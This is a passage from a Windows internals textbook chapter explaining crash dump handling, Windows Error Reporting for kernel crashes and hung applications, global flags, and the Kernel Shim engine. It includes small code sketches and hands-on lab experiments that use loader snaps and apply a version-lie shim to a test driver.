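    """Build a DUMPxxxx.tmp name from the low 16 bits of the tick count,
    retrying (here by incrementing) up to `attempts` times on collision."""
    for i in range(attempts):
        name = "DUMP%04X.tmp" % ((tick_count + i) & 0xFFFF)
        if name not in existing_names:
            return name
    return None  # no nonconflicting name found

print(make_temp_dump_name(0x1234ABCD, {"DUMPABCD.tmp"}))  # DUMPABCE.tmp
```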
Next, the Session Manager creates the volatile registry key HKLM\SYSTEM\CurrentControlSet\
Control\CrashControl\MachineCrash and stores the temporary dump file name in the value DumpFile.
It then writes a DWORD to the TempDestination value indicating whether the dump file location is only
a temporary destination. If the paging file is on the same volume as the destination dump file, a tempo-
rary dump file isn’t used because the paging file is truncated and directly renamed to the target dump
file name. In this case, the DumpFile value will be that of the target dump file, and TempDestination
will be 0.
Later in the boot, Wininit checks for the presence of the MachineCrash key, and if it exists, launches
the Windows Fault Reporting process (Werfault.exe) with the -k -c command-line switches (the k
flag indicates kernel error reporting, and the c flag indicates that the full or kernel dump should
be converted to a minidump). WerFault reads the TempDestination and DumpFile values. If the
TempDestination value is set to 1, which indicates a temporary file was used, WerFault moves the
temporary file to its target location and secures the target file by allowing only the System account
and the local Administrators group access. WerFault then writes the final dump file name to the
FinalDumpFileLocation value in the MachineCrash key. These steps are shown in Figure 10-43.
FIGURE 10-43 Crash dump file generation.
To provide more control over where the dump file data is written to—for example, on systems
that boot from a SAN or systems with insufficient disk space on the volume where the paging file
is configured—Windows also supports the use of a dedicated dump file that is configured in the
DedicatedDumpFile and DumpFileSize values under the HKLM\SYSTEM\CurrentControlSet\Control\
CrashControl registry key. When a dedicated dump file is specified, the crash dump driver creates
the dump file of the specified size and writes the crash data there instead of to the paging file. If no
DumpFileSize value is given, Windows creates a dedicated dump file using the largest file size that
would be required to store a complete dump. Windows calculates the required size as the size of the
total number of physical pages of memory present in the system plus the size required for the dump
header (one page on 32-bit systems, and two pages on 64-bit systems), plus the maximum value for
secondary crash dump data, which is 256 MB. If a full or kernel dump is configured but there is not
enough space on the target volume to create the dedicated dump file of the required size, the system
falls back to writing a minidump.
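The size calculation described above can be expressed directly. The 4 KB page size and the exact rounding are assumptions of this sketch; the constants (one header page on 32-bit, two on 64-bit, and 256 MB for secondary data) are the ones given in the text.

```python
def dedicated_dump_file_size(physical_pages, is_64bit, page_size=4096):
    """Largest size needed for a complete dump: all physical memory pages,
    plus the dump header (one page on 32-bit systems, two on 64-bit),
    plus the 256 MB maximum for secondary crash dump data."""
    header_pages = 2 if is_64bit else 1
    secondary_max = 256 * 1024 * 1024
    return (physical_pages + header_pages) * page_size + secondary_max

# Example: 4 GB of RAM on a 64-bit system.
print(dedicated_dump_file_size(4 * 1024**3 // 4096, True))
```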
Kernel reports
After the WerFault process is started by Wininit and has correctly generated the final dump file,
WerFault generates the report to send to the Microsoft Online Crash Analysis site (or, if configured,
an internal error reporting server). Generating a report for a kernel crash is a procedure that involves
the following:
1. If the type of dump generated was not a minidump, it extracts a minidump from the dump file and
stores it in the default location of %SystemRoot%\Minidump, unless otherwise configured through
the MinidumpDir value in the HKLM\SYSTEM\CurrentControlSet\Control\CrashControl key.
2. It writes the name of the minidump files to HKLM\SOFTWARE\Microsoft\Windows\Windows
Error Reporting\KernelFaults\Queue.
3. It adds a command to execute WerFault.exe (%SystemRoot%\System32\WerFault.exe) with the
–k –rq flags (the rq flag specifies to use queued reporting mode and that WerFault should be
restarted) to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce so that WerFault
is executed during the first user's logon to the system for purposes of actually sending the
error report.
When the WerFault utility executes during logon, as a result of having configured itself to start, it
launches itself again using the –k –q flags (the q flag on its own specifies queued reporting mode) and
terminates the previous instance. It does this to prevent the Windows shell from waiting on WerFault
by returning control to RunOnce as quickly as possible. The newly launched WerFault.exe checks the
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\KernelFaults\Queue key to look
for queued reports that may have been added in the previous dump conversion phase. It also checks
whether there are previously unsent crash reports from previous sessions. If there are, WerFault.exe
generates two XML-formatted files:
■  The first contains a basic description of the system, including the operating system version,
a list of drivers installed on the machine, and the list of devices present in the system.
■  The second contains metadata used by the OCA service, including the event type that triggered
WER and additional configuration information, such as the system manufacturer.
WerFault then sends a copy of the two XML files and the minidump to the Microsoft OCA server, which
forwards the data to a server farm for automated analysis. The server farm’s automated analysis uses
the same analysis engine that the Microsoft kernel debuggers use when you load a crash dump file into
them. The analysis generates a bucket ID, which is a signature that identifies a particular crash type.
Process hang detection
Windows Error Reporting is also used when an application hangs and stops working because of some
defect or bug in its code. An immediate effect of an application hanging is that it does not react to
any user interaction. The algorithm used for detecting a hanging application depends on the applica-
tion type: the Modern application stack detects that a Centennial or UWP application is hung when
a request sent from the HAM (Host Activity Manager) is not processed after a well-defined timeout
(usually 30 seconds); Task Manager detects a hung application when an application does not reply
to the WM_QUIT message; and Win32 desktop applications are considered hung (not responding) when
a foreground window stops processing GDI messages for more than 5 seconds.
Describing all the hang-detection algorithms is outside the scope of this book. Instead, we will con-
sider the most likely case: a classical Win32 desktop application that has stopped responding to any user
input. The detection starts in the Win32k kernel driver, which, after the 5-second timeout, sends a mes-
sage to the DwmApiPort ALPC port created by the Desktop Window Manager (Dwm.exe). The DWM
processes the message using a complex algorithm that ends up creating a “ghost” window on top of the
hanging window. The ghost redraws the window’s original content, blurring it out and adding the (Not
Responding) string in the title. The ghost window processes GDI messages through an internal message
pump routine, which intercepts the close, exit, and activate messages by calling the ReportHang routine
exported by the Windows User Mode Crash Reporting DLL (faultrep.dll). The ReportHang function simply
builds a WERSVC_REPORT_HANG message and sends it to the WER service to wait for a reply.
The WER service processes the message and initializes the Hang reporting by reading settings values
from the HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs root registry key. In par-
ticular, the MaxHangrepInstances value indicates how many hang reports can be generated
at the same time (the default is eight if the value does not exist), while the TerminationTimeout
value specifies the time that must pass after WER has tried to terminate the hanging process before
the entire system is considered to be in a hanging situation (10 seconds by default). This situation can happen
for various reasons—for example, an application has an active pending IRP that is never completed by
a kernel driver. The WER service opens the hanging process and obtains its token and some other basic
information. It then creates a shared memory section object to store that data (similar to user application
crashes; in this case, the shared section has a name: Global\<Random GUID>).
A WerFault process is spawned in a suspended state using the faulting process’s token and the -h
command-line switch (which is used to specify to generate a report for a hanging process). Unlike
with user application crashes, a snapshot of the hanging process is taken from the WER service using
a full SYSTEM token by invoking the PssNtCaptureSnapshot API exported in Ntdll. The snapshot's
handle is duplicated in the suspended WerFault process, which is resumed after the snapshot has been
successfully acquired. When WerFault starts, it signals an event indicating that report generation
has started. From this stage on, the original process can be terminated. Information for the report is
grabbed from the cloned process.
The report for a hanging process is similar to the one acquired for a crashing process: The WerFault
process starts by querying the value of the Debugger registry value located in the global HKLM\
Software\Microsoft\Windows\Windows Error Reporting\Hangs root registry key. If there is a valid
debugger, it is launched and attached to the original hanging process. In case the Disable registry value
is set to 1, the procedure is aborted and the WerFault process exits without generating any report.
Otherwise, WerFault opens the shared memory section, validates it, and grabs all the information
previously saved by the WER service. The report is initialized by using the WerReportCreate func-
tion exported in WER.dll, which is also used for crashing processes. The dialog box for a hanging process
(shown in Figure 10-44) is always displayed, regardless of the WER configuration. Finally, the
WerReportSubmit function (exported in WER.dll) is used to generate all the files for the report (includ-
ing the minidump file), similarly to user application crashes (see the "Crash report generation" section
earlier in this chapter). The report is finally sent to the Online Crash Analysis server.
FIGURE 10-44 The Windows Error Reporting dialog box for hanging applications.
After the report generation is started and the WERSVC_HANG_REPORTING_STARTED message
is returned to DWM, WER kills the hanging process using the TerminateProcess API. If the process
is not terminated in an expected time frame (generally 10 seconds, but customizable through the
TerminationTimeout setting as explained earlier), the WER service relaunches another WerFault instance
running under a full SYSTEM token and waits for another, longer timeout (usually 60 seconds, but custom-
izable through the LongTerminationTimeout setting). If the process is not terminated even by the end
of the longer timeout, WER has no choice other than to write an ETW event to the Application event
log, reporting its inability to terminate the process. The ETW event is shown in Figure 10-45.
Note that the event description is misleading because WER hasn't been able to terminate the hanging
application.
FIGURE 10-45 ETW error event written to the Application log for a nonterminating hanging application.
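The escalation just described can be sketched as a small decision function using the default timeouts; the timing mechanics are simplified and the outcome strings are illustrative.

```python
def hang_termination_outcome(seconds_until_exit,
                             termination_timeout=10,
                             long_termination_timeout=60):
    """Model WER's escalation for a hanging process: after calling
    TerminateProcess, wait TerminationTimeout seconds; then relaunch
    WerFault under a full SYSTEM token and wait LongTerminationTimeout
    more seconds; finally give up and log an ETW error event."""
    if seconds_until_exit <= termination_timeout:
        return "terminated"
    if seconds_until_exit <= termination_timeout + long_termination_timeout:
        return "terminated by SYSTEM WerFault"
    return "ETW error event logged"

print(hang_termination_outcome(5))    # terminated
print(hang_termination_outcome(300))  # ETW error event logged
```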
Global flags
Windows has a set of flags stored in two systemwide global variables named NtGlobalFlag and
NtGlobalFlag2 that enable various internal debugging, tracing, and validation support in the
operating system. The two system variables are initialized from the registry key HKLM\SYSTEM\
CurrentControlSet\Control\Session Manager in the values GlobalFlag and GlobalFlag2 at system boot
time (phase 0 of the NT kernel initialization). By default, both registry values are 0, so it’s likely that
on your systems, you’re not using any global flags. In addition, each image has a set of global flags
that also turn on internal tracing and validation code (although the bit layout of these flags is slightly
different from the systemwide global flags).
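To make the bitmask concrete, here is a sketch that decodes a GlobalFlag value using a few of the publicly documented flag bits; the full flag table is much longer.

```python
# A few well-known NtGlobalFlag bits, from the public GFlags
# documentation (the complete table has many more entries).
GFLAGS = {
    0x00000001: "FLG_STOP_ON_EXCEPTION",
    0x00000002: "FLG_SHOW_LDR_SNAPS",
    0x00000010: "FLG_HEAP_ENABLE_TAIL_CHECK",
    0x00000020: "FLG_HEAP_ENABLE_FREE_CHECK",
    0x00000040: "FLG_HEAP_VALIDATE_PARAMETERS",
    0x02000000: "FLG_HEAP_PAGE_ALLOCS",
}

def decode_global_flags(value):
    """Return the names of the known flags set in a GlobalFlag bitmask."""
    return [name for bit, name in sorted(GFLAGS.items()) if value & bit]

print(decode_global_flags(0x02000002))
# ['FLG_SHOW_LDR_SNAPS', 'FLG_HEAP_PAGE_ALLOCS']
```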
Fortunately, the debugging tools contain a utility named Gflags.exe that you can use to view and
change the system global flags (either in the registry or in the running system) as well as image global
flags. Gflags has both a command-line and a GUI interface. To see the command-line flags, type
gflags /?. If you run the utility without any switches, the dialog box shown in Figure 10-46 is displayed.
FIGURE 10-46 Setting system debugging options with GFlags.
Flags belonging to the Windows global flag variables can be split into different categories:
■  Kernel flags are processed directly by various components of the NT kernel (the heap manager,
exceptions, interrupt handlers, and so on).
■  User flags are processed by components running in user-mode applications (usually Ntdll).
■  Boot-only flags are processed only when the system is starting.
■  Per-image file global flags (which have a slightly different meaning than the others) are pro-
cessed by the loader, WER, and some other user-mode components, depending on the user-
mode process context in which they are running.
The names of the group pages shown by the GFlags tool are a little misleading. Kernel, boot-only, and
user flags are mixed together in each page. The main difference is that the System Registry page allows
the user to set global flags in the GlobalFlag and GlobalFlag2 registry values, which are parsed at system
boot time. This implies that newly set flags are enabled only after the system is rebooted. The Kernel Flags
page, despite its name, does not allow kernel flags to be applied on the fly to a live system. Only certain
user-mode flags can be set or removed (the enable page heap flag is a good example) without requiring
a system reboot: the Gflags tool sets those flags using the NtSetSystemInformation native API (with the
SystemFlagsInformation information class). Only user-mode flags can be set in that way.
EXPERIMENT: Viewing and setting global flags
You can use the !gflag kernel debugger command to view and set the state of the NtGlobalFlag
kernel variable. The !gflag command lists all the flags that are enabled. You can use !gflag -? to
get the entire list of supported global flags. At the time of this writing, the !gflag extension has
not been updated to display the content of the NtGlobalFlag2 variable.
The Image File page requires you to fill in the file name of an executable image. Use this option
to change a set of global flags that apply to an individual image (rather than to the whole system).
The page is shown in Figure 10-47. Notice that the flags are different from the operating system ones
shown in Figure 10-46. Most of the flags and the setting available in the Image File and Silent Process
Exit pages are applied by storing new values in a subkey with the same name as the image file (that is,
notepad.exe for the case shown in Figure 10-47) under the HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options registry key (also known as the IFEO key). In particular,
the GlobalFlag (and GlobalFlag2) value represents a bitmask of all the available per-image global flags.
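As a sketch of how a per-image flag value is composed, the following builds the IFEO subkey path for an image and sets the loader-snaps bit (FLG_SHOW_LDR_SNAPS, 0x2) in a GlobalFlag value. It only computes the path and bitmask; it does not touch the registry.

```python
def ifeo_key_for(image_name):
    """Registry path (under HKLM) holding per-image global flags."""
    return (r"SOFTWARE\Microsoft\Windows NT\CurrentVersion"
            r"\Image File Execution Options" + "\\" + image_name)

FLG_SHOW_LDR_SNAPS = 0x2  # publicly documented loader-snaps flag bit

def with_loader_snaps(current_global_flag):
    """New GlobalFlag bitmask with loader snaps enabled."""
    return current_global_flag | FLG_SHOW_LDR_SNAPS

print(ifeo_key_for("notepad.exe"))
print(hex(with_loader_snaps(0x40)))  # 0x42
```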
FIGURE 10-47 Setting per-image global flags with GFlags.
When the loader initializes a newly created process and loads all the dependent libraries
of the main base executable (see Chapter 3 of Part 1 for more details about the birth of a process),
the system processes the per-image global flags. The LdrpInitializeExecutionOptions internal function
opens the IFEO key based on the name of the base image and parses all the per-image settings and
flags. In particular, after the per-image global flags are retrieved from the registry, they are stored in
the NtGlobalFlag (and NtGlobalFlag2) field of the process PEB. In this way, they can be easily accessed
by any image mapped in the process (including Ntdll).
Most of the available global flags are documented at https://docs.microsoft.com/en-us/
windows-hardware/drivers/debugger/gflags-flag-table.
EXPERIMENT: Troubleshooting Windows loader issues
In the “Watching the image loader” experiment in Chapter 3 of Part 1, you used the GFlags tool
to display the Windows loader runtime information. That information can be useful for under-
standing why an application does not start at all (without returning any useful error informa-
tion). You can retry the same experiment on mspaint.exe by renaming the Msftedit.dll file (the
Rich Text Edit Control library) located in %SystemRoot%\system32. Indeed, Paint depends on
that DLL indirectly. The Msftedit library is loaded dynamically by MSCTF.dll. (It is not statically
linked in the Paint executable.) Open an administrative command prompt window and type the
following commands:
cd /d c:\windows\system32
takeown /f msftedit.dll
icacls msftedit.dll /grant Administrators:F
ren msftedit.dll msftedit.disabled
Then enable the loader snaps using the Gflags tool, as specified in the “Watching the image
loader” experiment. If you start mspaint.exe using Windbg, the loader snaps would be able to
highlight the problem almost immediately, returning the following text:
142c:1e18 @ 00056578 - LdrpInitializeNode - INFO: Calling init routine 00007FFC79258820 for
DLL "C:\Windows\System32\MSCTF.dll"142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL
name: .\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL name: C:\Program Files\Debugging Tools
for Windows (x64)\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL name: C:\Windows\system32\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
. . .
C:\Users\test\AppData\Local\Microsoft\WindowsApps\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpSearchPath - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrpProcessWork - ERROR: Unable to load DLL: "MSFTEDIT.DLL", Parent
Module: "(null)", Status: 0xc0000135
142c:133c @ 00229625 - LdrpLoadDllInternal - RETURN: Status: 0xc0000135
142c:133c @ 00229625 - LdrLoadDll - RETURN: Status: 0xc0000135
Kernel shims
New releases of the Windows operating system can sometimes bring issues with old drivers, which
can have difficulty operating in the new environment, producing system hangs or blue screens of
death. To overcome the problem, Windows 8.1 introduced a Kernel Shim engine that is able to dynami-
cally modify old drivers so that they can continue to run in the new OS release. The Kernel Shim engine is
implemented mainly in the NT kernel. Driver shims are registered through the Windows registry and
the shim database file, and are provided by shim drivers. A shim driver uses the exported
KseRegisterShimEx API to register a shim that can be applied to target drivers that need it. The Kernel
Shim engine supports mainly two kinds of shims, applied to devices or to drivers.
Shim engine initialization
In early OS boot stages, the Windows Loader, while loading all the boot-loaded drivers, reads and
maps the driver compatibility database file, located in %SystemRoot%\apppatch\Drvmain.sdb (and, if
it exists, also in the Drvpatch.sdb file). In phase 1 of the NT kernel initialization, the I/O manager starts
the two phases of the Kernel Shim engine initialization. The NT kernel copies the binary content of
the database file(s) into a global buffer allocated from the paged pool (pointed to by the internal global
KsepShimDb variable). It then checks whether kernel shims are globally disabled: if the system
has booted in Safe mode or WinPE mode, or if Driver Verifier is enabled, the shim engine is not
enabled. The Kernel Shim engine can also be controlled using system policies or through the HKLM\
System\CurrentControlSet\Control\Compatibility\DisableFlags registry value. The NT kernel then gath-
ers low-level system information needed when applying device shims, like the BIOS information and
OEM ID, by checking the System Fixed ACPI Descriptor Table (FADT). The shim engine registers the first
built-in shim provider, named DriverScope, using the KseRegisterShimEx API. Built-in shims provided by
Windows are listed in Table 10-21. Some of them are indeed implemented in the NT kernel directly and
not in any external driver. DriverScope is the only shim registered in phase 0.
TABLE 10-21 Windows built-in kernel shims

- DriverScope ({BC04AB45-EA7E-4A11-A7BB-977615F4CAAE}; NT kernel): Collects health ETW events for a target driver. Its hooks do nothing other than write an ETW event before or after calling the original, nonshimmed callbacks.
- Version Lie ({3E28B2D1-E633-408C-8E9B-2AFA6F47FCC3} for 7.1, {47712F55-BD93-43FC-9248-B9A83710066E} for 8, {21C4FB58-D477-4839-A7EA-AD6918FBC518} for 8.1; NT kernel): Available for Windows 7, 8, and 8.1. The shim reports a previous version of the OS when required by the driver to which it is applied.
- SkipDriverUnload ({3E8C2CA6-34E2-4DE6-8A1E-9692DD3E316B}; NT kernel): Replaces the driver's unload routine with one that does nothing except log an ETW event.
- ZeroPool ({6B847429-C430-4682-B55F-FD11A7B55465}; NT kernel): Replaces the ExAllocatePool API with a function that allocates the pool memory and zeroes it out.
- ClearPCIDBits ({B4678DFF-BD3E-46C9-923B-B5733483B0B3}; NT kernel): Clears the PCID bits when some antivirus drivers map physical memory referred to by CR3.
- Kaspersky ({B4678DFF-CC3E-46C9-923B-B5733483B0B3}; NT kernel): Created for specific Kaspersky filter drivers; masks the real value of the UseVtHardware registry value, which could have caused bug checks on old versions of the antivirus.
- Memcpy ({8A2517C1-35D6-4CA8-9EC8-98A12762891B}; NT kernel): Provides a safer (but slower) memory copy implementation that always zeroes out the destination buffer and can be used with device memory.
- KernelPadSectionsOverride ({4F55C0DB-73D3-43F2-9723-8A9C7F79D39D}; NT kernel): Prevents discardable sections of any kernel module from being freed by the memory manager and blocks the loading of the target driver (the one to which the shim is applied).
- NDIS Shim ({49691313-1362-4e75-8c2a-2dd72928eba5}; Ndis.sys): NDIS version compatibility shim (returns 6.40 where applied to a driver).
- SrbShim ({434ABAFD-08FA-4c3d-A88D-D09A88E2AB17}; Storport.sys): SCSI Request Block compatibility shim that intercepts IOCTL_STORAGE_QUERY_PROPERTY.
CHAPTER 10 Management, diagnostics, and tracing
559
- DeviceIdShim ({0332ec62-865a-4a39-b48f-cda6e855f423}; Storport.sys): Compatibility shim for RAID devices.
- ATADeviceIdShim ({26665d57-2158-4e4b-a959-c917d03a0d7e}; Storport.sys): Compatibility shim for serial ATA devices.
- Bluetooth Filter Power shim ({6AD90DAD-C144-4E9D-A0CF-AE9FCB901EBD}; Bthport.sys): Compatibility shim for Bluetooth filter drivers.
- UsbShim ({fd8fd62e-4d94-4fc7-8a68-bff7865a706b}; Usbd.sys): Compatibility shim for old Conexant USB modems.
- Nokia Usbser Filter Shim ({7DD60997-651F-4ECB-B893-BEC8050F3BD7}; Usbd.sys): Compatibility shim for Nokia Usbser filter drivers (used by Nokia PC Suite).
A shim is internally represented through the KSE_SHIM data structure (where KSE stands for Kernel Shim Engine). The data structure includes the shim's GUID, its human-readable name, and an array of hook collections (KSE_HOOK_COLLECTION data structures). Driver shims support different kinds of hooks: hooks on functions exported by the NT kernel, the HAL, or driver libraries, and hooks on a driver's object callback functions. In phase 1 of its initialization, the Shim engine registers the Microsoft-Windows-Kernel-ShimEngine ETW provider (which has the {0bf2fb94-7b60-4b4d-9766-e82f658df540} GUID), opens the driver shim database, and initializes the remaining built-in shims implemented in the NT kernel (refer to Table 10-21).
To register a shim (through KseRegisterShimEx), the NT kernel performs some initial integrity checks on both the KSE_SHIM data structure and each hook in the collections (all hooks must reside in the address space of the calling driver). It then allocates and fills a KSE_REGISTERED_SHIM_ENTRY data structure which, as the name implies, represents the registered shim. It contains a reference counter and a pointer back to the driver object (used only in case the shim is not implemented in the NT kernel). The allocated data structure is linked into a global list, which keeps track of all the registered shims in the system.
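The registration bookkeeping just described can be modeled in a short user-mode sketch. This is an illustrative analogy only, not the real kernel API: the dictionary layout, the `register_shim` name, and the address ranges are all hypothetical stand-ins for the KSE_SHIM structure and the calling driver's image.

```python
REGISTERED_SHIMS = []  # models the global linked list of registered shims

def register_shim(shim, driver_ranges):
    """Model of KseRegisterShimEx bookkeeping: validate that every hook
    lies inside the calling driver's image, then link the shim into the
    global list together with a reference counter."""
    for collection in shim["collections"]:
        for hook_address in collection["hooks"]:
            if not any(lo <= hook_address < hi for lo, hi in driver_ranges):
                raise ValueError("hook outside the calling driver's address space")
    entry = {"shim": shim, "refcount": 0}
    REGISTERED_SHIMS.append(entry)
    return entry
```

A hook whose address falls outside the supplied ranges is rejected, mirroring the integrity check performed before a KSE_REGISTERED_SHIM_ENTRY is allocated.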
The shim database
The shim database (SDB) file format was first introduced in the old Windows XP for Application
Compatibility. The initial goal of the file format was to store a binary XML-style database of programs
and drivers that needed some sort of help from the operating system to work correctly. The SDB file
has been adapted to include kernel-mode shims. The file format describes an XML database using tags. A tag is a 2-byte basic data structure used as a unique identifier for entries and attributes in the database. It is made of a 4-bit type, which identifies the format of the data associated with the tag, and a 12-bit index. Each tag thus indicates the type, size, and interpretation of the data that follows it. An SDB file has a 12-byte header and a set of tags. The set of tags usually defines three main blocks in the shim database file:
- The INDEX block contains index tags that allow fast lookup of elements in the database. Indexes in the INDEX block are stored in increasing order; searching for an element in the indexes is therefore a fast operation (a binary search). For the Kernel Shim engine, the elements are stored in the INDEX block using an 8-byte key derived from the shim name.
- The DATABASE block contains top-level tags describing shims, drivers, devices, and executables. Each top-level tag contains children tags describing properties or inner blocks belonging to the root entity.
- The STRING TABLE block contains strings that are referenced by lower-level tags in the DATABASE block. Tags in the DATABASE block usually do not directly describe a string but instead contain a reference to a tag (called STRINGREF) describing a string located in the string table. This allows databases that contain many common strings to remain small.
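The 2-byte tag layout can be illustrated with a small sketch. The placement of the type in the high 4 bits matches Microsoft's published SDB notes, but treat the exact masks here as an assumption of this example:

```python
def parse_tag(raw: int):
    """Split a 2-byte SDB tag into its 4-bit type (which determines the
    format of the data that follows the tag) and its 12-bit index."""
    tag_type = (raw >> 12) & 0xF
    tag_index = raw & 0xFFF
    return tag_type, tag_index
```

For example, a raw tag value of 0x7001 decodes to type 0x7 with index 0x001.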
Microsoft has partially documented the SDB file format and the APIs used to read and write it at
https://docs.microsoft.com/en-us/windows/win32/devnotes/application-compatibility-database. All the
SDB APIs are implemented in the Application Compatibility Client Library (apphelp.dll).
Driver shims
The NT memory manager decides whether to apply a shim to a kernel driver at its loading time, using
the KseDriverLoadImage function (boot-loaded drivers are processed by the I/O manager, as discussed
in Chapter 12). The routine is called at the right point in a kernel module's life cycle, before Driver Verifier, Import Optimization, or Kernel Patch protection are applied to it. (This is important; otherwise, the system would bugcheck.) A list of the currently shimmed kernel modules is stored in a
global variable. The KsepGetShimsForDriver routine checks whether a module in the list with the same
base address as the one being loaded is currently present. If so, it means that the target module has
already been shimmed, so the procedure is aborted. Otherwise, to determine whether the new module
should be shimmed, the routine checks two different sources:
- It queries the "Shims" multistring value from a registry key named after the module being loaded and located in the HKLM\System\CurrentControlSet\Control\Compatibility\Driver root key. The registry value contains an array of shim names to be applied to the target module.
- If the registry value for the target module does not exist, it parses the driver compatibility database file, looking for a KDRIVER tag (indexed by the INDEX block) that has the same name as the module being loaded. If the driver is found in the SDB file, the NT kernel compares the driver version (TAG_SOURCE_OS, stored in the KDRIVER root tag), file name, and path (if the relative tags exist in the SDB) against the low-level system information gathered at engine initialization time (to determine whether the driver is compatible with the system). If any of this information does not match, the driver is skipped, and no shims are applied. Otherwise, the shim names list is grabbed from the KSHIM_REF lower-level tags (which are part of the root KDRIVER). These tags are references to the KSHIM entries located in the SDB database block.
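The "Shims" value read from the first source is a REG_MULTI_SZ: a sequence of NUL-terminated UTF-16LE strings ending with an extra NUL. A minimal user-mode parser for such a buffer might look like this (a sketch of the value's layout, not of how the kernel reads the registry):

```python
def parse_multi_sz(buf: bytes) -> list:
    """Decode a REG_MULTI_SZ buffer into the list of strings it holds.
    Empty entries (including the terminating double NUL) are dropped."""
    text = buf.decode("utf-16-le")
    return [s for s in text.split("\x00") if s]
```

Applied to a value holding the single shim name KmWin81VersionLie, the parser returns a one-element list.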
If one of the two sources yields one or more shim names to be applied to the target driver, the SDB file is parsed again to validate that a valid KSHIM descriptor exists for each name. If there are no tags related to the specified shim name (meaning that no shim descriptor exists in the database), the procedure is interrupted (this prevents an administrator from applying random non-Microsoft shims to a driver). Otherwise, an array of KSE_SHIM_INFO data structures is returned to KsepGetShimsForDriver.
The next step is to determine if the shims described by their descriptors have been registered in the
system. To do this, the Shim engine searches the global linked list of registered shims (filled every time a new shim is registered, as explained previously in the "Shim Engine initialization" section). If a
shim is not registered, the shim engine tries to load the driver that provides it (its name is stored in the
MODULE child tag of the root KSHIM entry) and tries again. When a shim is applied for the first time,
the Shim engine resolves the pointers of all the hooks described by the KSE_HOOK_COLLECTION data
structures’ array belonging to the registered shim (KSE_SHIM data structure). The shim engine allocates
and fills a KSE_SHIMMED_MODULE data structure representing the target module to be shimmed
(which includes the base address) and adds it to the global list checked in the beginning.
At this stage, the shim engine applies the shim to the target module using the internal
KsepApplyShimsToDriver routine. The latter cycles between each hook described by the KSE_HOOK_
COLLECTION array and patches the import address table (IAT) of the target module, replacing the
original address of the hooked functions with the new ones (described by the hook collection). Note
that the driver’s object callback functions (IRP handlers) are not processed at this stage. They are modi-
fied later by the I/O manager before the DriverInit routine of the target driver is called. The original
driver’s IRP callback routines are saved in the Driver Extension of the target driver. In that way, the
hooked functions have a simple way to call back into the original ones when needed.
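The IAT patching and callback saving described above can be modeled with plain function objects. This is a deliberately simplified analogy: the dictionary stands in for the import address table, and the hook factory for an entry in a KSE_HOOK_COLLECTION; none of these names belong to the real kernel interfaces.

```python
def apply_shim(iat: dict, hooks: dict) -> dict:
    """Model of KsepApplyShimsToDriver: for each hooked import, save the
    original pointer and swap in a hook that can call back into it."""
    originals = {}
    for name, make_hook in hooks.items():
        originals[name] = iat[name]
        iat[name] = make_hook(iat[name])
    return originals

def version_lie(original):
    # A "version lie" style hook: call the saved original, then report
    # Windows 8.1 (6.3) regardless of the real answer.
    def hooked():
        original()
        return (6, 3)
    return hooked
```

A driver that calls through the patched table now receives the lied version, while the saved original remains reachable for the hook to call back into, mirroring how the original IRP callbacks are preserved in the Driver Extension.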
EXPERIMENT: Witnessing kernel shims
While the official Microsoft Application Compatibility Toolkit distributed with the Windows
Assessment and Deployment Kit allows you to open, modify, and create shim database files, it
does not work with system database files (identified through their internal GUIDs), so it won't
be able to parse all the kernel shims that are described by the drvmain.sdb database. Multiple
third-party SDB parsers exist. One in particular, called SDB explorer, is freely downloadable from
https://ericzimmerman.github.io/.
In this experiment, you get a peek at the drvmain system database file and apply a kernel shim
to a test driver, ShimDriver, which is available in this book’s downloadable resources. For this experi-
ment, you need to enable test signing (the ShimDriver is signed with a test self-signed certificate):
1. Open an administrative command prompt and type the following command:
   bcdedit /set testsigning on
2. Restart your computer, download SDB Explorer from its website, run it, and open the drvmain.sdb database located in %SystemRoot%\apppatch.
3. From the SDB Explorer main window, you can explore the entire database file, organized in three main blocks: Indexes, Databases, and String table. Expand the DATABASES root block and scroll down until you can see the list of KSHIMs (they should be located after the KDEVICEs). You should see a window similar to the following:
4. You will apply one of the Version lie shims to our test driver. First, copy ShimDriver to %SystemRoot%\System32\Drivers. Then install it by typing the following command in the administrative command prompt (it is assumed that your system is 64-bit):
   sc create ShimDriver type= kernel start= demand error= normal binPath= c:\Windows\System32\ShimDriver64.sys
5. Before starting the test driver, download and run the DebugView tool, available on the Sysinternals website (https://docs.microsoft.com/en-us/sysinternals/downloads/debugview). This is necessary because ShimDriver prints some debug messages.
6. Start the ShimDriver with the following command:
   sc start shimdriver
7. Check the output of the DebugView tool. You should see messages like the one shown in the following figure. What you see depends on the Windows version in which you run the driver. In the example, we run the driver on an insider release version of Windows Server 2022:
8. Now stop the driver and enable one of the shims present in the SDB database. In this example, you will start with one of the version lie shims. Stop the target driver and install the shim using the following commands (where ShimDriver64.sys is the driver's file name installed in the previous step):
   sc stop shimdriver
   reg add "HKLM\System\CurrentControlSet\Control\Compatibility\Driver\ShimDriver64.sys" /v Shims /t REG_MULTI_SZ /d KmWin81VersionLie /f /reg:64
9. The last command adds the Windows 8.1 version lie shim, but you can freely choose other versions.
10. Now, if you restart the driver, you will see different messages printed by the DebugView tool, as shown in the following figure:
11. This is because the shim engine has correctly applied the hooks on the NT APIs used for retrieving OS version information (the driver is able to detect the shim, too). You should be able to repeat the experiment using other shims, like SkipDriverUnload or KernelPadSectionsOverride, which will zero out the driver unload routine or prevent the target driver from loading, as shown in the following figure:
Device shims
Unlike Driver shims, shims applied to Device objects are loaded and applied on demand. The NT kernel
exports the KseQueryDeviceData function, which allows drivers to check whether a shim needs to be
applied to a device object. (Note also that the KseQueryDeviceFlags function is exported. The API is just
a subset of the first one, though.) Querying for device shims is also possible for user-mode applications
